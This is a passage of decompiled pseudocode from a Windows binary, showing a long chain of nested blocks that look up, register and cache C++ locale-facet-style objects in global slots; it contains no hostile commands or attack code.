                                                                                                			E00F86E46(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v80;
                                                                                                				signed int _t261;
                                                                                                				void* _t486;
                                                                                                				short* _t700;
                                                                                                				void* _t764;
                                                                                                				signed int _t767;
                                                                                                				signed int _t768;
                                                                                                				signed int _t769;
                                                                                                				signed int _t770;
                                                                                                				signed int _t771;
                                                                                                				signed int _t772;
                                                                                                				signed int _t773;
                                                                                                				signed int _t774;
                                                                                                				signed int _t775;
                                                                                                				signed int _t776;
                                                                                                				signed int _t777;
                                                                                                				signed int _t778;
                                                                                                				signed int _t779;
                                                                                                				signed int _t780;
                                                                                                				signed int _t781;
                                                                                                				signed int _t782;
                                                                                                				signed int _t783;
                                                                                                				signed int _t784;
                                                                                                				signed int _t785;
                                                                                                				signed int _t786;
                                                                                                				signed int _t788;
                                                                                                				signed int _t789;
                                                                                                				signed int _t790;
                                                                                                				signed int _t791;
                                                                                                				signed int _t792;
                                                                                                				signed int _t793;
                                                                                                				signed int _t794;
                                                                                                				signed int _t795;
                                                                                                				signed int _t796;
                                                                                                				signed int _t797;
                                                                                                				signed int _t798;
                                                                                                				signed int _t799;
                                                                                                				signed int _t800;
                                                                                                				signed int _t801;
                                                                                                				signed int _t802;
                                                                                                				signed int _t803;
                                                                                                				signed int _t804;
                                                                                                				signed int _t805;
                                                                                                				signed int _t806;
                                                                                                				signed int _t807;
                                                                                                				signed int _t808;
                                                                                                				short* _t809;
                                                                                                
                                                                                                				_t764 = __edx;
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t788 =  *0xfd0b20; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t788;
                                                                                                				_t261 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t766 = _t261;
                                                                                                				if(_t261 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t766);
                                                                                                				} else {
                                                                                                					if(_t788 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F8836C(_t766, _t788, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t766, _t788);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t789 =  *0xfd0aec; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t789;
                                                                                                							_t767 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t767;
                                                                                                							if(_t767 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t767);
                                                                                                							} else {
                                                                                                								__eflags = _t789;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F883D2(_t767, _t789, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t767, _t789);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t790 =  *0xfd0b00; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t790;
                                                                                                										_t768 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t768;
                                                                                                										if(_t768 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t768);
                                                                                                										} else {
                                                                                                											__eflags = _t790;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F88438(_t764, _t768, _t790, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t768, _t790);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t791 =  *0xfd0ad0; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t791;
                                                                                                													_t769 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t769;
                                                                                                													if(_t769 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t769);
                                                                                                													} else {
                                                                                                														__eflags = _t791;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F884DA(_t764, _t769, _t791, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t769, _t791);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t792 =  *0xfd0af0; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t792;
                                                                                                																_t770 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t770;
                                                                                                																if(_t770 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t770);
                                                                                                																} else {
                                                                                                																	__eflags = _t792;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F8857C(_t770, _t792, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t770, _t792);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t793 =  *0xfd0b04; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t793;
                                                                                                																			_t771 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t771;
                                                                                                																			if(_t771 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t771);
                                                                                                																			} else {
                                                                                                																				__eflags = _t793;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					__eflags = E00F885EC(_t771, _t793, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t771, _t793);
                                                                                                																						E00F856E6( &_v20, 0);
                                                                                                																						_t794 =  *0xfd0ad4; // 0x0
                                                                                                																						_v4 = _v4 & 0x00000000;
                                                                                                																						_v16 = _t794;
                                                                                                																						_t772 = E00F78A40(_a8, E00F789D0());
                                                                                                																						__eflags = _t772;
                                                                                                																						if(_t772 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E( &_v20);
                                                                                                																							return E00FB388C(_t772);
                                                                                                																						} else {
                                                                                                																							__eflags = _t794;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push(_a8);
                                                                                                																								_push( &_v16);
                                                                                                																								__eflags = E00F88654(_t772, _t794, __eflags) - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(8);
                                                                                                																									E00FB38B2(0xfb6ebe, _t772, _t794);
                                                                                                																									E00F856E6( &_v20, 0);
                                                                                                																									_t795 =  *0xfd0b08; // 0x0
                                                                                                																									_v4 = _v4 & 0x00000000;
                                                                                                																									_v16 = _t795;
                                                                                                																									_t773 = E00F78A40(_a8, E00F789D0());
                                                                                                																									__eflags = _t773;
                                                                                                																									if(_t773 != 0) {
                                                                                                																										L54:
                                                                                                																										E00F8573E( &_v20);
                                                                                                																										return E00FB388C(_t773);
                                                                                                																									} else {
                                                                                                																										__eflags = _t795;
                                                                                                																										if(__eflags == 0) {
                                                                                                																											_push(_a8);
                                                                                                																											_push( &_v16);
                                                                                                																											__eflags = E00F886BC(_t773, _t795, __eflags) - 0xffffffff;
                                                                                                																											if(__eflags == 0) {
                                                                                                																												E00F78FE0(__eflags);
                                                                                                																												asm("int3");
                                                                                                																												_push(8);
                                                                                                																												E00FB38B2(0xfb6ebe, _t773, _t795);
                                                                                                																												E00F856E6( &_v20, 0);
                                                                                                																												_t796 =  *0xfd0ad8; // 0x0
                                                                                                																												_v4 = _v4 & 0x00000000;
                                                                                                																												_v16 = _t796;
                                                                                                																												_t774 = E00F78A40(_a8, E00F789D0());
                                                                                                																												__eflags = _t774;
                                                                                                																												if(_t774 != 0) {
                                                                                                																													L61:
                                                                                                																													E00F8573E( &_v20);
                                                                                                																													return E00FB388C(_t774);
                                                                                                																												} else {
                                                                                                																													__eflags = _t796;
                                                                                                																													if(__eflags == 0) {
                                                                                                																														_push(_a8);
                                                                                                																														_push( &_v16);
                                                                                                																														__eflags = E00F88724(_t774, _t796, __eflags) - 0xffffffff;
                                                                                                																														if(__eflags == 0) {
                                                                                                																															E00F78FE0(__eflags);
                                                                                                																															asm("int3");
                                                                                                																															_push(8);
                                                                                                																															E00FB38B2(0xfb6ebe, _t774, _t796);
                                                                                                																															E00F856E6( &_v20, 0);
                                                                                                																															_t797 =  *0xfd0b0c; // 0x0
                                                                                                																															_v4 = _v4 & 0x00000000;
                                                                                                																															_v16 = _t797;
                                                                                                																															_t775 = E00F78A40(_a8, E00F789D0());
                                                                                                																															__eflags = _t775;
                                                                                                																															if(_t775 != 0) {
                                                                                                																																L68:
                                                                                                																																E00F8573E( &_v20);
                                                                                                																																return E00FB388C(_t775);
                                                                                                																															} else {
                                                                                                																																__eflags = _t797;
                                                                                                																																if(__eflags == 0) {
                                                                                                																																	_push(_a8);
                                                                                                																																	_push( &_v16);
                                                                                                																																	__eflags = E00F8878C(_t775, _t797, __eflags) - 0xffffffff;
                                                                                                																																	if(__eflags == 0) {
                                                                                                																																		E00F78FE0(__eflags);
                                                                                                																																		asm("int3");
                                                                                                																																		_push(8);
                                                                                                																																		E00FB38B2(0xfb6ebe, _t775, _t797);
                                                                                                																																		E00F856E6( &_v20, 0);
                                                                                                																																		_t798 =  *0xfd0adc; // 0x0
                                                                                                																																		_v4 = _v4 & 0x00000000;
                                                                                                																																		_v16 = _t798;
                                                                                                																																		_t776 = E00F78A40(_a8, E00F789D0());
                                                                                                																																		__eflags = _t776;
                                                                                                																																		if(_t776 != 0) {
                                                                                                																																			L75:
                                                                                                																																			E00F8573E( &_v20);
                                                                                                																																			return E00FB388C(_t776);
                                                                                                																																		} else {
                                                                                                																																			__eflags = _t798;
                                                                                                																																			if(__eflags == 0) {
                                                                                                																																				_push(_a8);
                                                                                                																																				_push( &_v16);
                                                                                                																																				__eflags = E00F887F4(_t776, _t798, __eflags) - 0xffffffff;
                                                                                                																																				if(__eflags == 0) {
                                                                                                																																					E00F78FE0(__eflags);
                                                                                                																																					asm("int3");
                                                                                                																																					_push(8);
                                                                                                																																					E00FB38B2(0xfb6ebe, _t776, _t798);
                                                                                                																																					E00F856E6( &_v20, 0);
                                                                                                																																					_t799 =  *0xfd0b14; // 0x0
                                                                                                																																					_v4 = _v4 & 0x00000000;
                                                                                                																																					_v16 = _t799;
                                                                                                																																					_t777 = E00F78A40(_a8, E00F789D0());
                                                                                                																																					__eflags = _t777;
                                                                                                																																					if(_t777 != 0) {
                                                                                                																																						L82:
                                                                                                																																						E00F8573E( &_v20);
                                                                                                																																						return E00FB388C(_t777);
                                                                                                																																					} else {
                                                                                                																																						__eflags = _t799;
                                                                                                																																						if(__eflags == 0) {
                                                                                                																																							_push(_a8);
                                                                                                																																							_push( &_v16);
                                                                                                																																							__eflags = E00F8885C(_t777, _t799, __eflags) - 0xffffffff;
                                                                                                																																							if(__eflags == 0) {
                                                                                                																																								E00F78FE0(__eflags);
                                                                                                																																								asm("int3");
                                                                                                																																								_push(8);
                                                                                                																																								E00FB38B2(0xfb6ebe, _t777, _t799);
                                                                                                																																								E00F856E6( &_v20, 0);
                                                                                                																																								_t800 =  *0xfd0b10; // 0x0
                                                                                                																																								_v4 = _v4 & 0x00000000;
                                                                                                																																								_v16 = _t800;
                                                                                                																																								_t778 = E00F78A40(_a8, E00F789D0());
                                                                                                																																								__eflags = _t778;
                                                                                                																																								if(_t778 != 0) {
                                                                                                																																									L89:
                                                                                                																																									E00F8573E( &_v20);
                                                                                                																																									return E00FB388C(_t778);
                                                                                                																																								} else {
                                                                                                																																									__eflags = _t800;
                                                                                                																																									if(__eflags == 0) {
                                                                                                																																										_push(_a8);
                                                                                                																																										_push( &_v16);
                                                                                                																																										__eflags = E00F888E0(_t778, _t800, __eflags) - 0xffffffff;
                                                                                                																																										if(__eflags == 0) {
                                                                                                																																											E00F78FE0(__eflags);
                                                                                                																																											asm("int3");
                                                                                                																																											_push(8);
                                                                                                																																											E00FB38B2(0xfb6ebe, _t778, _t800);
                                                                                                																																											E00F856E6( &_v20, 0);
                                                                                                																																											_t801 =  *0xfd0ae4; // 0x0
                                                                                                																																											_v4 = _v4 & 0x00000000;
                                                                                                																																											_v16 = _t801;
                                                                                                																																											_t779 = E00F78A40(_a8, E00F789D0());
                                                                                                																																											__eflags = _t779;
                                                                                                																																											if(_t779 != 0) {
                                                                                                																																												L96:
                                                                                                																																												E00F8573E( &_v20);
                                                                                                																																												return E00FB388C(_t779);
                                                                                                																																											} else {
                                                                                                																																												__eflags = _t801;
                                                                                                																																												if(__eflags == 0) {
                                                                                                																																													_push(_a8);
                                                                                                																																													_push( &_v16);
                                                                                                																																													__eflags = E00F88965(_t779, _t801, __eflags) - 0xffffffff;
                                                                                                																																													if(__eflags == 0) {
                                                                                                																																														E00F78FE0(__eflags);
                                                                                                																																														asm("int3");
                                                                                                																																														_push(8);
                                                                                                																																														E00FB38B2(0xfb6ebe, _t779, _t801);
                                                                                                																																														E00F856E6( &_v20, 0);
                                                                                                																																														_t802 =  *0xfd0ae0; // 0x0
                                                                                                																																														_v4 = _v4 & 0x00000000;
                                                                                                																																														_v16 = _t802;
                                                                                                																																														_t780 = E00F78A40(_a8, E00F789D0());
                                                                                                																																														__eflags = _t780;
                                                                                                																																														if(_t780 != 0) {
                                                                                                																																															L103:
                                                                                                																																															E00F8573E( &_v20);
                                                                                                																																															return E00FB388C(_t780);
                                                                                                																																														} else {
                                                                                                																																															__eflags = _t802;
                                                                                                																																															if(__eflags == 0) {
                                                                                                																																																_push(_a8);
                                                                                                																																																_push( &_v16);
                                                                                                																																																__eflags = E00F889E9(_t780, _t802, __eflags) - 0xffffffff;
                                                                                                																																																if(__eflags == 0) {
                                                                                                																																																	E00F78FE0(__eflags);
                                                                                                																																																	asm("int3");
                                                                                                																																																	_push(8);
                                                                                                																																																	E00FB38B2(0xfb6ebe, _t780, _t802);
                                                                                                																																																	E00F856E6( &_v20, 0);
                                                                                                																																																	_t803 =  *0xfd0af4; // 0x0
                                                                                                																																																	_v4 = _v4 & 0x00000000;
                                                                                                																																																	_v16 = _t803;
                                                                                                																																																	_t781 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																	__eflags = _t781;
                                                                                                																																																	if(_t781 != 0) {
                                                                                                																																																		L110:
                                                                                                																																																		E00F8573E( &_v20);
                                                                                                																																																		return E00FB388C(_t781);
                                                                                                																																																	} else {
                                                                                                																																																		__eflags = _t803;
                                                                                                																																																		if(__eflags == 0) {
                                                                                                																																																			_push(_a8);
                                                                                                																																																			_push( &_v16);
                                                                                                																																																			__eflags = E00F88A6E(_t781, _t803, __eflags) - 0xffffffff;
                                                                                                																																																			if(__eflags == 0) {
                                                                                                																																																				E00F78FE0(__eflags);
                                                                                                																																																				asm("int3");
                                                                                                																																																				_push(8);
                                                                                                																																																				E00FB38B2(0xfb6ebe, _t781, _t803);
                                                                                                																																																				E00F856E6( &_v20, 0);
                                                                                                																																																				_t804 =  *0xfd0af8; // 0x0
                                                                                                																																																				_v4 = _v4 & 0x00000000;
                                                                                                																																																				_v16 = _t804;
                                                                                                																																																				_t782 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																				__eflags = _t782;
                                                                                                																																																				if(_t782 != 0) {
                                                                                                																																																					L117:
                                                                                                																																																					E00F8573E( &_v20);
                                                                                                																																																					return E00FB388C(_t782);
                                                                                                																																																				} else {
                                                                                                																																																					__eflags = _t804;
                                                                                                																																																					if(__eflags == 0) {
                                                                                                																																																						_push(_a8);
                                                                                                																																																						_push( &_v16);
                                                                                                																																																						__eflags = E00F88AD6(_t782, _t804, __eflags) - 0xffffffff;
                                                                                                																																																						if(__eflags == 0) {
                                                                                                																																																							E00F78FE0(__eflags);
                                                                                                																																																							asm("int3");
                                                                                                																																																							_push(8);
                                                                                                																																																							E00FB38B2(0xfb6ebe, _t782, _t804);
                                                                                                																																																							E00F856E6( &_v20, 0);
                                                                                                																																																							_t805 =  *0xfd0afc; // 0x0
                                                                                                																																																							_v4 = _v4 & 0x00000000;
                                                                                                																																																							_v16 = _t805;
                                                                                                																																																							_t783 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																							__eflags = _t783;
                                                                                                																																																							if(_t783 != 0) {
                                                                                                																																																								L124:
                                                                                                																																																								E00F8573E( &_v20);
                                                                                                																																																								return E00FB388C(_t783);
                                                                                                																																																							} else {
                                                                                                																																																								__eflags = _t805;
                                                                                                																																																								if(__eflags == 0) {
                                                                                                																																																									_push(_a8);
                                                                                                																																																									_push( &_v16);
                                                                                                																																																									__eflags = E00F88B3E(_t764, _t783, _t805, __eflags) - 0xffffffff;
                                                                                                																																																									if(__eflags == 0) {
                                                                                                																																																										E00F78FE0(__eflags);
                                                                                                																																																										asm("int3");
                                                                                                																																																										_push(8);
                                                                                                																																																										E00FB38B2(0xfb6ebe, _t783, _t805);
                                                                                                																																																										E00F856E6( &_v20, 0);
                                                                                                																																																										_t806 =  *0xfd0b18; // 0x0
                                                                                                																																																										_v4 = _v4 & 0x00000000;
                                                                                                																																																										_v16 = _t806;
                                                                                                																																																										_t784 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																										__eflags = _t784;
                                                                                                																																																										if(_t784 != 0) {
                                                                                                																																																											L131:
                                                                                                																																																											E00F8573E( &_v20);
                                                                                                																																																											return E00FB388C(_t784);
                                                                                                																																																										} else {
                                                                                                																																																											__eflags = _t806;
                                                                                                																																																											if(__eflags == 0) {
                                                                                                																																																												_push(_a8);
                                                                                                																																																												_push( &_v16);
                                                                                                																																																												__eflags = E00F88BB9(_t784, _t806, __eflags) - 0xffffffff;
                                                                                                																																																												if(__eflags == 0) {
                                                                                                																																																													E00F78FE0(__eflags);
                                                                                                																																																													asm("int3");
                                                                                                																																																													_push(8);
                                                                                                																																																													E00FB38B2(0xfb6ebe, _t784, _t806);
                                                                                                																																																													E00F856E6( &_v20, 0);
                                                                                                																																																													_t807 =  *0xfd0ae8; // 0x0
                                                                                                																																																													_v4 = _v4 & 0x00000000;
                                                                                                																																																													_v16 = _t807;
                                                                                                																																																													_t785 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																													__eflags = _t785;
                                                                                                																																																													if(_t785 != 0) {
                                                                                                																																																														L138:
                                                                                                																																																														E00F8573E( &_v20);
                                                                                                																																																														return E00FB388C(_t785);
                                                                                                																																																													} else {
                                                                                                																																																														__eflags = _t807;
                                                                                                																																																														if(__eflags == 0) {
                                                                                                																																																															_push(_a8);
                                                                                                																																																															_push( &_v16);
                                                                                                																																																															__eflags = E00F88C25(_t785, _t807, __eflags) - 0xffffffff;
                                                                                                																																																															if(__eflags == 0) {
                                                                                                																																																																E00F78FE0(__eflags);
                                                                                                																																																																asm("int3");
                                                                                                																																																																_push(8);
                                                                                                																																																																E00FB38B2(0xfb6ebe, _t785, _t807);
                                                                                                																																																																E00F856E6( &_v20, 0);
                                                                                                																																																																_t808 =  *0xfd0b1c; // 0x0
                                                                                                																																																																_v4 = _v4 & 0x00000000;
                                                                                                																																																																_v16 = _t808;
                                                                                                																																																																_t786 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																																__eflags = _t786;
                                                                                                																																																																if(_t786 != 0) {
                                                                                                																																																																	L145:
                                                                                                																																																																	E00F8573E( &_v20);
                                                                                                																																																																	return E00FB388C(_t786);
                                                                                                																																																																} else {
                                                                                                																																																																	__eflags = _t808;
                                                                                                																																																																	if(__eflags == 0) {
                                                                                                																																																																		_push(_a8);
                                                                                                																																																																		_push( &_v16);
                                                                                                																																																																		_t486 = E00F88C91(_t786, _t808, __eflags);
                                                                                                																																																																		_pop(_t700);
                                                                                                																																																																		__eflags = _t486 - 0xffffffff;
                                                                                                																																																																		if(__eflags == 0) {
                                                                                                																																																																			E00F78FE0(__eflags);
                                                                                                																																																																			asm("int3");
                                                                                                																																																																			_push(_t808);
                                                                                                																																																																			_t809 = _t700;
                                                                                                																																																																			_t254 = _t809 + 0x10;
                                                                                                																																																																			 *_t254 =  *(_t809 + 0x10) & 0x00000000;
                                                                                                																																																																			__eflags =  *_t254;
                                                                                                																																																																			 *((intOrPtr*)(_t809 + 0x14)) = 7;
                                                                                                																																																																			 *_t809 = 0;
                                                                                                																																																																			E00F8D9F3(_v80);
                                                                                                																																																																			return _t809;
                                                                                                																																																																		} else {
                                                                                                																																																																			_t786 = _v16;
                                                                                                																																																																			_v16 = _t786;
                                                                                                																																																																			_v4 = 1;
                                                                                                																																																																			E00F85472(_t786);
                                                                                                																																																																			 *0xfb81fc();
                                                                                                																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t786 + 4))))();
                                                                                                																																																																			 *0xfd0b1c = _t786;
                                                                                                																																																																			goto L145;
                                                                                                																																																																		}
                                                                                                																																																																	} else {
                                                                                                																																																																		_t786 = _t808;
                                                                                                																																																																		goto L145;
                                                                                                																																																																	}
                                                                                                																																																																}
                                                                                                																																																															} else {
                                                                                                																																																																_t785 = _v16;
                                                                                                																																																																_v16 = _t785;
                                                                                                																																																																_v4 = 1;
                                                                                                																																																																E00F85472(_t785);
                                                                                                																																																																 *0xfb81fc();
                                                                                                																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t785 + 4))))();
                                                                                                																																																																 *0xfd0ae8 = _t785;
                                                                                                																																																																goto L138;
                                                                                                																																																															}
                                                                                                																																																														} else {
                                                                                                																																																															_t785 = _t807;
                                                                                                																																																															goto L138;
                                                                                                																																																														}
                                                                                                																																																													}
                                                                                                																																																												} else {
                                                                                                																																																													_t784 = _v16;
                                                                                                																																																													_v16 = _t784;
                                                                                                																																																													_v4 = 1;
                                                                                                																																																													E00F85472(_t784);
                                                                                                																																																													 *0xfb81fc();
                                                                                                																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t784 + 4))))();
                                                                                                																																																													 *0xfd0b18 = _t784;
                                                                                                																																																													goto L131;
                                                                                                																																																												}
                                                                                                																																																											} else {
                                                                                                																																																												_t784 = _t806;
                                                                                                																																																												goto L131;
                                                                                                																																																											}
                                                                                                																																																										}
                                                                                                																																																									} else {
                                                                                                																																																										_t783 = _v16;
                                                                                                																																																										_v16 = _t783;
                                                                                                																																																										_v4 = 1;
                                                                                                																																																										E00F85472(_t783);
                                                                                                																																																										 *0xfb81fc();
                                                                                                																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t783 + 4))))();
                                                                                                																																																										 *0xfd0afc = _t783;
                                                                                                																																																										goto L124;
                                                                                                																																																									}
                                                                                                																																																								} else {
                                                                                                																																																									_t783 = _t805;
                                                                                                																																																									goto L124;
                                                                                                																																																								}
                                                                                                																																																							}
                                                                                                																																																						} else {
                                                                                                																																																							_t782 = _v16;
                                                                                                																																																							_v16 = _t782;
                                                                                                																																																							_v4 = 1;
                                                                                                																																																							E00F85472(_t782);
                                                                                                																																																							 *0xfb81fc();
                                                                                                																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t782 + 4))))();
                                                                                                																																																							 *0xfd0af8 = _t782;
                                                                                                																																																							goto L117;
                                                                                                																																																						}
                                                                                                																																																					} else {
                                                                                                																																																						_t782 = _t804;
                                                                                                																																																						goto L117;
                                                                                                																																																					}
                                                                                                																																																				}
                                                                                                																																																			} else {
                                                                                                																																																				_t781 = _v16;
                                                                                                																																																				_v16 = _t781;
                                                                                                																																																				_v4 = 1;
                                                                                                																																																				E00F85472(_t781);
                                                                                                																																																				 *0xfb81fc();
                                                                                                																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t781 + 4))))();
                                                                                                																																																				 *0xfd0af4 = _t781;
                                                                                                																																																				goto L110;
                                                                                                																																																			}
                                                                                                																																																		} else {
                                                                                                																																																			_t781 = _t803;
                                                                                                																																																			goto L110;
                                                                                                																																																		}
                                                                                                																																																	}
                                                                                                																																																} else {
                                                                                                																																																	_t780 = _v16;
                                                                                                																																																	_v16 = _t780;
                                                                                                																																																	_v4 = 1;
                                                                                                																																																	E00F85472(_t780);
                                                                                                																																																	 *0xfb81fc();
                                                                                                																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t780 + 4))))();
                                                                                                																																																	 *0xfd0ae0 = _t780;
                                                                                                																																																	goto L103;
                                                                                                																																																}
                                                                                                																																															} else {
                                                                                                																																																_t780 = _t802;
                                                                                                																																																goto L103;
                                                                                                																																															}
                                                                                                																																														}
                                                                                                																																													} else {
                                                                                                																																														_t779 = _v16;
                                                                                                																																														_v16 = _t779;
                                                                                                																																														_v4 = 1;
                                                                                                																																														E00F85472(_t779);
                                                                                                																																														 *0xfb81fc();
                                                                                                																																														 *((intOrPtr*)( *((intOrPtr*)( *_t779 + 4))))();
                                                                                                																																														 *0xfd0ae4 = _t779;
                                                                                                																																														goto L96;
                                                                                                																																													}
                                                                                                																																												} else {
                                                                                                																																													_t779 = _t801;
                                                                                                																																													goto L96;
                                                                                                																																												}
                                                                                                																																											}
                                                                                                																																										} else {
                                                                                                																																											_t778 = _v16;
                                                                                                																																											_v16 = _t778;
                                                                                                																																											_v4 = 1;
                                                                                                																																											E00F85472(_t778);
                                                                                                																																											 *0xfb81fc();
                                                                                                																																											 *((intOrPtr*)( *((intOrPtr*)( *_t778 + 4))))();
                                                                                                																																											 *0xfd0b10 = _t778;
                                                                                                																																											goto L89;
                                                                                                																																										}
                                                                                                																																									} else {
                                                                                                																																										_t778 = _t800;
                                                                                                																																										goto L89;
                                                                                                																																									}
                                                                                                																																								}
                                                                                                																																							} else {
                                                                                                																																								_t777 = _v16;
                                                                                                																																								_v16 = _t777;
                                                                                                																																								_v4 = 1;
                                                                                                																																								E00F85472(_t777);
                                                                                                																																								 *0xfb81fc();
                                                                                                																																								 *((intOrPtr*)( *((intOrPtr*)( *_t777 + 4))))();
                                                                                                																																								 *0xfd0b14 = _t777;
                                                                                                																																								goto L82;
                                                                                                																																							}
                                                                                                																																						} else {
                                                                                                																																							_t777 = _t799;
                                                                                                																																							goto L82;
                                                                                                																																						}
                                                                                                																																					}
                                                                                                																																				} else {
                                                                                                																																					_t776 = _v16;
                                                                                                																																					_v16 = _t776;
                                                                                                																																					_v4 = 1;
                                                                                                																																					E00F85472(_t776);
                                                                                                																																					 *0xfb81fc();
                                                                                                																																					 *((intOrPtr*)( *((intOrPtr*)( *_t776 + 4))))();
                                                                                                																																					 *0xfd0adc = _t776;
                                                                                                																																					goto L75;
                                                                                                																																				}
                                                                                                																																			} else {
                                                                                                																																				_t776 = _t798;
                                                                                                																																				goto L75;
                                                                                                																																			}
                                                                                                																																		}
                                                                                                																																	} else {
                                                                                                																																		_t775 = _v16;
                                                                                                																																		_v16 = _t775;
                                                                                                																																		_v4 = 1;
                                                                                                																																		E00F85472(_t775);
                                                                                                																																		 *0xfb81fc();
                                                                                                																																		 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
                                                                                                																																		 *0xfd0b0c = _t775;
                                                                                                																																		goto L68;
                                                                                                																																	}
                                                                                                																																} else {
                                                                                                																																	_t775 = _t797;
                                                                                                																																	goto L68;
                                                                                                																																}
                                                                                                																															}
                                                                                                																														} else {
                                                                                                																															_t774 = _v16;
                                                                                                																															_v16 = _t774;
                                                                                                																															_v4 = 1;
                                                                                                																															E00F85472(_t774);
                                                                                                																															 *0xfb81fc();
                                                                                                																															 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
                                                                                                																															 *0xfd0ad8 = _t774;
                                                                                                																															goto L61;
                                                                                                																														}
                                                                                                																													} else {
                                                                                                																														_t774 = _t796;
                                                                                                																														goto L61;
                                                                                                																													}
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												_t773 = _v16;
                                                                                                																												_v16 = _t773;
                                                                                                																												_v4 = 1;
                                                                                                																												E00F85472(_t773);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
                                                                                                																												 *0xfd0b08 = _t773;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t773 = _t795;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t772 = _v16;
                                                                                                																									_v16 = _t772;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t772);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
                                                                                                																									 *0xfd0ad4 = _t772;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
